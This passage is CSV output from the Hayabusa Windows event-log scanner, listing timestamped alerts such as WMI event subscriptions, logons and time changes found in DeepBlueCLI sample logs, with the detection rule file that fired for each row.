Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a20 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a67 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x39a20,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:34:54.649 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x39a67,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:39.718 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:36:44.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 
+2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:53.245 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24902 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24936 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x24902,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Not 
Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:42:34.667 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:42:56.213 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x24936,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:43:44.838 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:44:02.385 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:45:58.015 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:46:01.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:46:10.368 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19489 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - 
Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x194bb : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x19489,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:48:32.133 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:48:32.133 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:54:00.258 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x194bb,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:54:58.140 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:02.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:55:06.370 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19153 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - 
Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1917f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x19153,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:59:43.385 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:17:38.760 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:21:25.557 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:27:57.838 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:38:14.682 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:49:57.323 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 
0x1917f,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:54:11.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:54:23.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:54:29.619 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:55:00.775 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 
05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b15e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b18a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:55:00.775 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x2b15e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.259 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event 
